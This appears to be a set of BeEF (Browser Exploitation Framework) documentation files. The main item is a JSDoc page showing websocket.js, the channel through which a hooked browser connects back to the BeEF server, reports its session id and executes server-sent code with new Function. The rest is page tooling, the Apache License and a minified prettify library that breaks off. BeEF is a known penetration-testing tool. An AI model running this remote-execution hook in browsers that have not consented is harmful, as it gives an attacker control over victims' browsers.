HTML | beef/docs/websocket.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: websocket.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: websocket.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Manage the WebSocket communication channel.
* This channel is much faster and responsive, and it's used automatically
* if the browser supports WebSockets AND beef.http.websocket.enable = true.
* @namespace beef.websocket
*/
beef.websocket = {
socket:null,
ws_poll_timeout: "<%= @ws_poll_timeout %>",
ws_connect_timeout: "<%= @ws_connect_timeout %>",
/**
* Initialize the WebSocket client object.
* Note: use WebSocketSecure only if the hooked origin is under https.
* Mixed-content in WS is quite different from a non-WS context.
*/
init:function () {
var webSocketServer = beef.net.host;
var webSocketPort = "<%= @websocket_port %>";
var webSocketSecure = "<%= @websocket_secure %>";
var protocol = "ws://";
if(webSocketSecure && window.location.protocol=="https:"){
protocol = "wss://";
webSocketPort= "<%= @websocket_sec_port %>";
}
if (beef.browser.isFF() && !!window.MozWebSocket) {
beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
}else{
beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
}
},
/**
* Send Helo message to the BeEF server and start async polling.
*/
start:function () {
new beef.websocket.init();
this.socket.onopen = function () {
beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
beef.websocket.alive();
};
this.socket.onmessage = function (message) {
// Data coming from the WebSocket channel is either of String, Blob or ArrayBufferdata type.
// That's why it needs to be evaluated first. Using Function is a bit better than pure eval().
// It's not a big deal anyway, because the eval'ed data comes from BeEF itself, so it is implicitly trusted.
new Function(message.data)();
};
this.socket.onclose = function () {
setTimeout(function(){beef.websocket.start()}, 5000);
};
},
/**
* Send data back to BeEF. This is basically the same as beef.net.send,
* but doesn't queue commands.
* Example usage:
* beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
* '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
* '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
*/
send:function (data) {
try {
this.socket.send(data);
}catch(err){}
},
/**
* Polling mechanism, to notify the BeEF server that the browser is still hooked,
* and the WebSocket channel still alive.
* todo: there is probably a more efficient way to do this. Double-check WebSocket API.
*/
alive: function (){
beef.websocket.send('{"alive":"'+beef.session.get_hook_session_id()+'"}');
setTimeout("beef.websocket.alive()", parseInt(beef.websocket.ws_poll_timeout));
}
};
beef.regCmp('beef.websocket');</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
JavaScript | beef/docs/scripts/linenumber.js | /*global document */
(() => {
const source = document.getElementsByClassName('prettyprint source linenums');
let i = 0;
let lineNumber = 0;
let lineId;
let lines;
let totalLines;
let anchorHash;
if (source && source[0]) {
anchorHash = document.location.hash.substring(1);
lines = source[0].getElementsByTagName('li');
totalLines = lines.length;
for (; i < totalLines; i++) {
lineNumber++;
lineId = `line${lineNumber}`;
lines[i].id = lineId;
if (lineId === anchorHash) {
lines[i].className += ' selected';
}
}
}
})(); |
Text | beef/docs/scripts/prettify/Apache-License-2.0.txt | Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction,
and distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by
the copyright owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all
other entities that control, are controlled by, or are under common
control with that entity. For the purposes of this definition,
"control" means (i) the power, direct or indirect, to cause the
direction or management of such entity, whether by contract or
otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity
exercising permissions granted by this License.
"Source" form shall mean the preferred form for making modifications,
including but not limited to software source code, documentation
source, and configuration files.
"Object" form shall mean any form resulting from mechanical
transformation or translation of a Source form, including but
not limited to compiled object code, generated documentation,
and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or
Object form, made available under the License, as indicated by a
copyright notice that is included in or attached to the work
(an example is provided in the Appendix below).
"Derivative Works" shall mean any work, whether in Source or Object
form, that is based on (or derived from) the Work and for which the
editorial revisions, annotations, elaborations, or other modifications
represent, as a whole, an original work of authorship. For the purposes
of this License, Derivative Works shall not include works that remain
separable from, or merely link (or bind by name) to the interfaces of,
the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including
the original version of the Work and any modifications or additions
to that Work or Derivative Works thereof, that is intentionally
submitted to Licensor for inclusion in the Work by the copyright owner
or by an individual or Legal Entity authorized to submit on behalf of
the copyright owner. For the purposes of this definition, "submitted"
means any form of electronic, verbal, or written communication sent
to the Licensor or its representatives, including but not limited to
communication on electronic mailing lists, source code control systems,
and issue tracking systems that are managed by, or on behalf of, the
Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise
designated in writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity
on behalf of whom a Contribution has been received by Licensor and
subsequently incorporated within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the
Work and such Derivative Works in Source or Object form.
3. Grant of Patent License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
(except as stated in this section) patent license to make, have made,
use, offer to sell, sell, import, and otherwise transfer the Work,
where such license applies only to those patent claims licensable
by such Contributor that are necessarily infringed by their
Contribution(s) alone or by combination of their Contribution(s)
with the Work to which such Contribution(s) was submitted. If You
institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work
or a Contribution incorporated within the Work constitutes direct
or contributory patent infringement, then any patent licenses
granted to You under this License for that Work shall terminate
as of the date such litigation is filed.
4. Redistribution. You may reproduce and distribute copies of the
Work or Derivative Works thereof in any medium, with or without
modifications, and in Source or Object form, provided that You
meet the following conditions:
(a) You must give any other recipients of the Work or
Derivative Works a copy of this License; and
(b) You must cause any modified files to carry prominent notices
stating that You changed the files; and
(c) You must retain, in the Source form of any Derivative Works
that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work,
excluding those notices that do not pertain to any part of
the Derivative Works; and
(d) If the Work includes a "NOTICE" text file as part of its
distribution, then any Derivative Works that You distribute must
include a readable copy of the attribution notices contained
within such NOTICE file, excluding those notices that do not
pertain to any part of the Derivative Works, in at least one
of the following places: within a NOTICE text file distributed
as part of the Derivative Works; within the Source form or
documentation, if provided along with the Derivative Works; or,
within a display generated by the Derivative Works, if and
wherever such third-party notices normally appear. The contents
of the NOTICE file are for informational purposes only and
do not modify the License. You may add Your own attribution
notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided
that such additional attribution notices cannot be construed
as modifying the License.
You may add Your own copyright statement to Your modifications and
may provide additional or different license terms and conditions
for use, reproduction, or distribution of Your modifications, or
for any such Derivative Works as a whole, provided Your use,
reproduction, and distribution of the Work otherwise complies with
the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise,
any Contribution intentionally submitted for inclusion in the Work
by You to the Licensor shall be under the terms and conditions of
this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify
the terms of any separate license agreement you may have executed
with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade
names, trademarks, service marks, or product names of the Licensor,
except as required for reasonable and customary use in describing the
origin of the Work and reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or
agreed to in writing, Licensor provides the Work (and each
Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied, including, without limitation, any warranties or conditions
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
PARTICULAR PURPOSE. You are solely responsible for determining the
appropriateness of using or redistributing the Work and assume any
risks associated with Your exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory,
whether in tort (including negligence), contract, or otherwise,
unless required by applicable law (such as deliberate and grossly
negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special,
incidental, or consequential damages of any character arising as a
result of this License or out of the use or inability to use the
Work (including but not limited to damages for loss of goodwill,
work stoppage, computer failure or malfunction, or any and all
other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability. While redistributing
the Work or Derivative Works thereof, You may choose to offer,
and charge a fee for, acceptance of support, warranty, indemnity,
or other liability obligations and/or rights consistent with this
License. However, in accepting such obligations, You may act only
on Your own behalf and on Your sole responsibility, not on behalf
of any other Contributor, and only if You agree to indemnify,
defend, and hold each Contributor harmless for any liability
incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
APPENDIX: How to apply the Apache License to your work.
To apply the Apache License to your work, attach the following
boilerplate notice, with the fields enclosed by brackets "[]"
replaced with your own identifying information. (Don't include
the brackets!) The text should be enclosed in the appropriate
comment syntax for the file format. We also recommend that a
file or class name and description of purpose be included on the
same "printed page" as the copyright notice for easier
identification within third-party archives.
Copyright [yyyy] [name of copyright owner]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License. |
JavaScript | beef/docs/scripts/prettify/lang-css.js | PR.registerLangHandler(PR.createSimpleLexer([["pln",/^[\t\n\f\r ]+/,null," \t\r\n"]],[["str",/^"(?:[^\n\f\r"\\]|\\(?:\r\n?|\n|\f)|\\[\S\s])*"/,null],["str",/^'(?:[^\n\f\r'\\]|\\(?:\r\n?|\n|\f)|\\[\S\s])*'/,null],["lang-css-str",/^url\(([^"')]*)\)/i],["kwd",/^(?:url|rgb|!important|@import|@page|@media|@charset|inherit)(?=[^\w-]|$)/i,null],["lang-css-kw",/^(-?(?:[_a-z]|\\[\da-f]+ ?)(?:[\w-]|\\\\[\da-f]+ ?)*)\s*:/i],["com",/^\/\*[^*]*\*+(?:[^*/][^*]*\*+)*\//],["com",
/^(?:<\!--|--\>)/],["lit",/^(?:\d+|\d*\.\d+)(?:%|[a-z]+)?/i],["lit",/^#[\da-f]{3,6}/i],["pln",/^-?(?:[_a-z]|\\[\da-f]+ ?)(?:[\w-]|\\\\[\da-f]+ ?)*/i],["pun",/^[^\s\w"']+/]]),["css"]);PR.registerLangHandler(PR.createSimpleLexer([],[["kwd",/^-?(?:[_a-z]|\\[\da-f]+ ?)(?:[\w-]|\\\\[\da-f]+ ?)*/i]]),["css-kw"]);PR.registerLangHandler(PR.createSimpleLexer([],[["str",/^[^"')]+/]]),["css-str"]); |
JavaScript | beef/docs/scripts/prettify/prettify.js | var q=null;window.PR_SHOULD_USE_CONTINUATION=!0;
(function(){function L(a){function m(a){var f=a.charCodeAt(0);if(f!==92)return f;var b=a.charAt(1);return(f=r[b])?f:"0"<=b&&b<="7"?parseInt(a.substring(1),8):b==="u"||b==="x"?parseInt(a.substring(2),16):a.charCodeAt(1)}function e(a){if(a<32)return(a<16?"\\x0":"\\x")+a.toString(16);a=String.fromCharCode(a);if(a==="\\"||a==="-"||a==="["||a==="]")a="\\"+a;return a}function h(a){for(var f=a.substring(1,a.length-1).match(/\\u[\dA-Fa-f]{4}|\\x[\dA-Fa-f]{2}|\\[0-3][0-7]{0,2}|\\[0-7]{1,2}|\\[\S\s]|[^\\]/g),a=
[],b=[],o=f[0]==="^",c=o?1:0,i=f.length;c<i;++c){var j=f[c];if(/\\[bdsw]/i.test(j))a.push(j);else{var j=m(j),d;c+2<i&&"-"===f[c+1]?(d=m(f[c+2]),c+=2):d=j;b.push([j,d]);d<65||j>122||(d<65||j>90||b.push([Math.max(65,j)|32,Math.min(d,90)|32]),d<97||j>122||b.push([Math.max(97,j)&-33,Math.min(d,122)&-33]))}}b.sort(function(a,f){return a[0]-f[0]||f[1]-a[1]});f=[];j=[NaN,NaN];for(c=0;c<b.length;++c)i=b[c],i[0]<=j[1]+1?j[1]=Math.max(j[1],i[1]):f.push(j=i);b=["["];o&&b.push("^");b.push.apply(b,a);for(c=0;c<
f.length;++c)i=f[c],b.push(e(i[0])),i[1]>i[0]&&(i[1]+1>i[0]&&b.push("-"),b.push(e(i[1])));b.push("]");return b.join("")}function y(a){for(var f=a.source.match(/\[(?:[^\\\]]|\\[\S\s])*]|\\u[\dA-Fa-f]{4}|\\x[\dA-Fa-f]{2}|\\\d+|\\[^\dux]|\(\?[!:=]|[()^]|[^()[\\^]+/g),b=f.length,d=[],c=0,i=0;c<b;++c){var j=f[c];j==="("?++i:"\\"===j.charAt(0)&&(j=+j.substring(1))&&j<=i&&(d[j]=-1)}for(c=1;c<d.length;++c)-1===d[c]&&(d[c]=++t);for(i=c=0;c<b;++c)j=f[c],j==="("?(++i,d[i]===void 0&&(f[c]="(?:")):"\\"===j.charAt(0)&&
(j=+j.substring(1))&&j<=i&&(f[c]="\\"+d[i]);for(i=c=0;c<b;++c)"^"===f[c]&&"^"!==f[c+1]&&(f[c]="");if(a.ignoreCase&&s)for(c=0;c<b;++c)j=f[c],a=j.charAt(0),j.length>=2&&a==="["?f[c]=h(j):a!=="\\"&&(f[c]=j.replace(/[A-Za-z]/g,function(a){a=a.charCodeAt(0);return"["+String.fromCharCode(a&-33,a|32)+"]"}));return f.join("")}for(var t=0,s=!1,l=!1,p=0,d=a.length;p<d;++p){var g=a[p];if(g.ignoreCase)l=!0;else if(/[a-z]/i.test(g.source.replace(/\\u[\da-f]{4}|\\x[\da-f]{2}|\\[^UXux]/gi,""))){s=!0;l=!1;break}}for(var r=
{b:8,t:9,n:10,v:11,f:12,r:13},n=[],p=0,d=a.length;p<d;++p){g=a[p];if(g.global||g.multiline)throw Error(""+g);n.push("(?:"+y(g)+")")}return RegExp(n.join("|"),l?"gi":"g")}function M(a){function m(a){switch(a.nodeType){case 1:if(e.test(a.className))break;for(var g=a.firstChild;g;g=g.nextSibling)m(g);g=a.nodeName;if("BR"===g||"LI"===g)h[s]="\n",t[s<<1]=y++,t[s++<<1|1]=a;break;case 3:case 4:g=a.nodeValue,g.length&&(g=p?g.replace(/\r\n?/g,"\n"):g.replace(/[\t\n\r ]+/g," "),h[s]=g,t[s<<1]=y,y+=g.length,
t[s++<<1|1]=a)}}var e=/(?:^|\s)nocode(?:\s|$)/,h=[],y=0,t=[],s=0,l;a.currentStyle?l=a.currentStyle.whiteSpace:window.getComputedStyle&&(l=document.defaultView.getComputedStyle(a,q).getPropertyValue("white-space"));var p=l&&"pre"===l.substring(0,3);m(a);return{a:h.join("").replace(/\n$/,""),c:t}}function B(a,m,e,h){m&&(a={a:m,d:a},e(a),h.push.apply(h,a.e))}function x(a,m){function e(a){for(var l=a.d,p=[l,"pln"],d=0,g=a.a.match(y)||[],r={},n=0,z=g.length;n<z;++n){var f=g[n],b=r[f],o=void 0,c;if(typeof b===
"string")c=!1;else{var i=h[f.charAt(0)];if(i)o=f.match(i[1]),b=i[0];else{for(c=0;c<t;++c)if(i=m[c],o=f.match(i[1])){b=i[0];break}o||(b="pln")}if((c=b.length>=5&&"lang-"===b.substring(0,5))&&!(o&&typeof o[1]==="string"))c=!1,b="src";c||(r[f]=b)}i=d;d+=f.length;if(c){c=o[1];var j=f.indexOf(c),k=j+c.length;o[2]&&(k=f.length-o[2].length,j=k-c.length);b=b.substring(5);B(l+i,f.substring(0,j),e,p);B(l+i+j,c,C(b,c),p);B(l+i+k,f.substring(k),e,p)}else p.push(l+i,b)}a.e=p}var h={},y;(function(){for(var e=a.concat(m),
l=[],p={},d=0,g=e.length;d<g;++d){var r=e[d],n=r[3];if(n)for(var k=n.length;--k>=0;)h[n.charAt(k)]=r;r=r[1];n=""+r;p.hasOwnProperty(n)||(l.push(r),p[n]=q)}l.push(/[\S\s]/);y=L(l)})();var t=m.length;return e}function u(a){var m=[],e=[];a.tripleQuotedStrings?m.push(["str",/^(?:'''(?:[^'\\]|\\[\S\s]|''?(?=[^']))*(?:'''|$)|"""(?:[^"\\]|\\[\S\s]|""?(?=[^"]))*(?:"""|$)|'(?:[^'\\]|\\[\S\s])*(?:'|$)|"(?:[^"\\]|\\[\S\s])*(?:"|$))/,q,"'\""]):a.multiLineStrings?m.push(["str",/^(?:'(?:[^'\\]|\\[\S\s])*(?:'|$)|"(?:[^"\\]|\\[\S\s])*(?:"|$)|`(?:[^\\`]|\\[\S\s])*(?:`|$))/,
q,"'\"`"]):m.push(["str",/^(?:'(?:[^\n\r'\\]|\\.)*(?:'|$)|"(?:[^\n\r"\\]|\\.)*(?:"|$))/,q,"\"'"]);a.verbatimStrings&&e.push(["str",/^@"(?:[^"]|"")*(?:"|$)/,q]);var h=a.hashComments;h&&(a.cStyleComments?(h>1?m.push(["com",/^#(?:##(?:[^#]|#(?!##))*(?:###|$)|.*)/,q,"#"]):m.push(["com",/^#(?:(?:define|elif|else|endif|error|ifdef|include|ifndef|line|pragma|undef|warning)\b|[^\n\r]*)/,q,"#"]),e.push(["str",/^<(?:(?:(?:\.\.\/)*|\/?)(?:[\w-]+(?:\/[\w-]+)+)?[\w-]+\.h|[a-z]\w*)>/,q])):m.push(["com",/^#[^\n\r]*/,
q,"#"]));a.cStyleComments&&(e.push(["com",/^\/\/[^\n\r]*/,q]),e.push(["com",/^\/\*[\S\s]*?(?:\*\/|$)/,q]));a.regexLiterals&&e.push(["lang-regex",/^(?:^^\.?|[!+-]|!=|!==|#|%|%=|&|&&|&&=|&=|\(|\*|\*=|\+=|,|-=|->|\/|\/=|:|::|;|<|<<|<<=|<=|=|==|===|>|>=|>>|>>=|>>>|>>>=|[?@[^]|\^=|\^\^|\^\^=|{|\||\|=|\|\||\|\|=|~|break|case|continue|delete|do|else|finally|instanceof|return|throw|try|typeof)\s*(\/(?=[^*/])(?:[^/[\\]|\\[\S\s]|\[(?:[^\\\]]|\\[\S\s])*(?:]|$))+\/)/]);(h=a.types)&&e.push(["typ",h]);a=(""+a.keywords).replace(/^ | $/g,
"");a.length&&e.push(["kwd",RegExp("^(?:"+a.replace(/[\s,]+/g,"|")+")\\b"),q]);m.push(["pln",/^\s+/,q," \r\n\t\xa0"]);e.push(["lit",/^@[$_a-z][\w$@]*/i,q],["typ",/^(?:[@_]?[A-Z]+[a-z][\w$@]*|\w+_t\b)/,q],["pln",/^[$_a-z][\w$@]*/i,q],["lit",/^(?:0x[\da-f]+|(?:\d(?:_\d+)*\d*(?:\.\d*)?|\.\d\+)(?:e[+-]?\d+)?)[a-z]*/i,q,"0123456789"],["pln",/^\\[\S\s]?/,q],["pun",/^.[^\s\w"-$'./@\\`]*/,q]);return x(m,e)}function D(a,m){function e(a){switch(a.nodeType){case 1:if(k.test(a.className))break;if("BR"===a.nodeName)h(a),
a.parentNode&&a.parentNode.removeChild(a);else for(a=a.firstChild;a;a=a.nextSibling)e(a);break;case 3:case 4:if(p){var b=a.nodeValue,d=b.match(t);if(d){var c=b.substring(0,d.index);a.nodeValue=c;(b=b.substring(d.index+d[0].length))&&a.parentNode.insertBefore(s.createTextNode(b),a.nextSibling);h(a);c||a.parentNode.removeChild(a)}}}}function h(a){function b(a,d){var e=d?a.cloneNode(!1):a,f=a.parentNode;if(f){var f=b(f,1),g=a.nextSibling;f.appendChild(e);for(var h=g;h;h=g)g=h.nextSibling,f.appendChild(h)}return e}
for(;!a.nextSibling;)if(a=a.parentNode,!a)return;for(var a=b(a.nextSibling,0),e;(e=a.parentNode)&&e.nodeType===1;)a=e;d.push(a)}var k=/(?:^|\s)nocode(?:\s|$)/,t=/\r\n?|\n/,s=a.ownerDocument,l;a.currentStyle?l=a.currentStyle.whiteSpace:window.getComputedStyle&&(l=s.defaultView.getComputedStyle(a,q).getPropertyValue("white-space"));var p=l&&"pre"===l.substring(0,3);for(l=s.createElement("LI");a.firstChild;)l.appendChild(a.firstChild);for(var d=[l],g=0;g<d.length;++g)e(d[g]);m===(m|0)&&d[0].setAttribute("value",
m);var r=s.createElement("OL");r.className="linenums";for(var n=Math.max(0,m-1|0)||0,g=0,z=d.length;g<z;++g)l=d[g],l.className="L"+(g+n)%10,l.firstChild||l.appendChild(s.createTextNode("\xa0")),r.appendChild(l);a.appendChild(r)}function k(a,m){for(var e=m.length;--e>=0;){var h=m[e];A.hasOwnProperty(h)?window.console&&console.warn("cannot override language handler %s",h):A[h]=a}}function C(a,m){if(!a||!A.hasOwnProperty(a))a=/^\s*</.test(m)?"default-markup":"default-code";return A[a]}function E(a){var m=
a.g;try{var e=M(a.h),h=e.a;a.a=h;a.c=e.c;a.d=0;C(m,h)(a);var k=/\bMSIE\b/.test(navigator.userAgent),m=/\n/g,t=a.a,s=t.length,e=0,l=a.c,p=l.length,h=0,d=a.e,g=d.length,a=0;d[g]=s;var r,n;for(n=r=0;n<g;)d[n]!==d[n+2]?(d[r++]=d[n++],d[r++]=d[n++]):n+=2;g=r;for(n=r=0;n<g;){for(var z=d[n],f=d[n+1],b=n+2;b+2<=g&&d[b+1]===f;)b+=2;d[r++]=z;d[r++]=f;n=b}for(d.length=r;h<p;){var o=l[h+2]||s,c=d[a+2]||s,b=Math.min(o,c),i=l[h+1],j;if(i.nodeType!==1&&(j=t.substring(e,b))){k&&(j=j.replace(m,"\r"));i.nodeValue=
j;var u=i.ownerDocument,v=u.createElement("SPAN");v.className=d[a+1];var x=i.parentNode;x.replaceChild(v,i);v.appendChild(i);e<o&&(l[h+1]=i=u.createTextNode(t.substring(b,o)),x.insertBefore(i,v.nextSibling))}e=b;e>=o&&(h+=2);e>=c&&(a+=2)}}catch(w){"console"in window&&console.log(w&&w.stack?w.stack:w)}}var v=["break,continue,do,else,for,if,return,while"],w=[[v,"auto,case,char,const,default,double,enum,extern,float,goto,int,long,register,short,signed,sizeof,static,struct,switch,typedef,union,unsigned,void,volatile"],
"catch,class,delete,false,import,new,operator,private,protected,public,this,throw,true,try,typeof"],F=[w,"alignof,align_union,asm,axiom,bool,concept,concept_map,const_cast,constexpr,decltype,dynamic_cast,explicit,export,friend,inline,late_check,mutable,namespace,nullptr,reinterpret_cast,static_assert,static_cast,template,typeid,typename,using,virtual,where"],G=[w,"abstract,boolean,byte,extends,final,finally,implements,import,instanceof,null,native,package,strictfp,super,synchronized,throws,transient"],
H=[G,"as,base,by,checked,decimal,delegate,descending,dynamic,event,fixed,foreach,from,group,implicit,in,interface,internal,into,is,lock,object,out,override,orderby,params,partial,readonly,ref,sbyte,sealed,stackalloc,string,select,uint,ulong,unchecked,unsafe,ushort,var"],w=[w,"debugger,eval,export,function,get,null,set,undefined,var,with,Infinity,NaN"],I=[v,"and,as,assert,class,def,del,elif,except,exec,finally,from,global,import,in,is,lambda,nonlocal,not,or,pass,print,raise,try,with,yield,False,True,None"],
J=[v,"alias,and,begin,case,class,def,defined,elsif,end,ensure,false,in,module,next,nil,not,or,redo,rescue,retry,self,super,then,true,undef,unless,until,when,yield,BEGIN,END"],v=[v,"case,done,elif,esac,eval,fi,function,in,local,set,then,until"],K=/^(DIR|FILE|vector|(de|priority_)?queue|list|stack|(const_)?iterator|(multi)?(set|map)|bitset|u?(int|float)\d*)/,N=/\S/,O=u({keywords:[F,H,w,"caller,delete,die,do,dump,elsif,eval,exit,foreach,for,goto,if,import,last,local,my,next,no,our,print,package,redo,require,sub,undef,unless,until,use,wantarray,while,BEGIN,END"+
I,J,v],hashComments:!0,cStyleComments:!0,multiLineStrings:!0,regexLiterals:!0}),A={};k(O,["default-code"]);k(x([],[["pln",/^[^<?]+/],["dec",/^<!\w[^>]*(?:>|$)/],["com",/^<\!--[\S\s]*?(?:--\>|$)/],["lang-",/^<\?([\S\s]+?)(?:\?>|$)/],["lang-",/^<%([\S\s]+?)(?:%>|$)/],["pun",/^(?:<[%?]|[%?]>)/],["lang-",/^<xmp\b[^>]*>([\S\s]+?)<\/xmp\b[^>]*>/i],["lang-js",/^<script\b[^>]*>([\S\s]*?)(<\/script\b[^>]*>)/i],["lang-css",/^<style\b[^>]*>([\S\s]*?)(<\/style\b[^>]*>)/i],["lang-in.tag",/^(<\/?[a-z][^<>]*>)/i]]),
["default-markup","htm","html","mxml","xhtml","xml","xsl"]);k(x([["pln",/^\s+/,q," \t\r\n"],["atv",/^(?:"[^"]*"?|'[^']*'?)/,q,"\"'"]],[["tag",/^^<\/?[a-z](?:[\w-.:]*\w)?|\/?>$/i],["atn",/^(?!style[\s=]|on)[a-z](?:[\w:-]*\w)?/i],["lang-uq.val",/^=\s*([^\s"'>]*(?:[^\s"'/>]|\/(?=\s)))/],["pun",/^[/<->]+/],["lang-js",/^on\w+\s*=\s*"([^"]+)"/i],["lang-js",/^on\w+\s*=\s*'([^']+)'/i],["lang-js",/^on\w+\s*=\s*([^\s"'>]+)/i],["lang-css",/^style\s*=\s*"([^"]+)"/i],["lang-css",/^style\s*=\s*'([^']+)'/i],["lang-css",
/^style\s*=\s*([^\s"'>]+)/i]]),["in.tag"]);k(x([],[["atv",/^[\S\s]+/]]),["uq.val"]);k(u({keywords:F,hashComments:!0,cStyleComments:!0,types:K}),["c","cc","cpp","cxx","cyc","m"]);k(u({keywords:"null,true,false"}),["json"]);k(u({keywords:H,hashComments:!0,cStyleComments:!0,verbatimStrings:!0,types:K}),["cs"]);k(u({keywords:G,cStyleComments:!0}),["java"]);k(u({keywords:v,hashComments:!0,multiLineStrings:!0}),["bsh","csh","sh"]);k(u({keywords:I,hashComments:!0,multiLineStrings:!0,tripleQuotedStrings:!0}),
["cv","py"]);k(u({keywords:"caller,delete,die,do,dump,elsif,eval,exit,foreach,for,goto,if,import,last,local,my,next,no,our,print,package,redo,require,sub,undef,unless,until,use,wantarray,while,BEGIN,END",hashComments:!0,multiLineStrings:!0,regexLiterals:!0}),["perl","pl","pm"]);k(u({keywords:J,hashComments:!0,multiLineStrings:!0,regexLiterals:!0}),["rb"]);k(u({keywords:w,cStyleComments:!0,regexLiterals:!0}),["js"]);k(u({keywords:"all,and,by,catch,class,else,extends,false,finally,for,if,in,is,isnt,loop,new,no,not,null,of,off,on,or,return,super,then,true,try,unless,until,when,while,yes",
hashComments:3,cStyleComments:!0,multilineStrings:!0,tripleQuotedStrings:!0,regexLiterals:!0}),["coffee"]);k(x([],[["str",/^[\S\s]+/]]),["regex"]);window.prettyPrintOne=function(a,m,e){var h=document.createElement("PRE");h.innerHTML=a;e&&D(h,e);E({g:m,i:e,h:h});return h.innerHTML};window.prettyPrint=function(a){function m(){for(var e=window.PR_SHOULD_USE_CONTINUATION?l.now()+250:Infinity;p<h.length&&l.now()<e;p++){var n=h[p],k=n.className;if(k.indexOf("prettyprint")>=0){var k=k.match(g),f,b;if(b=
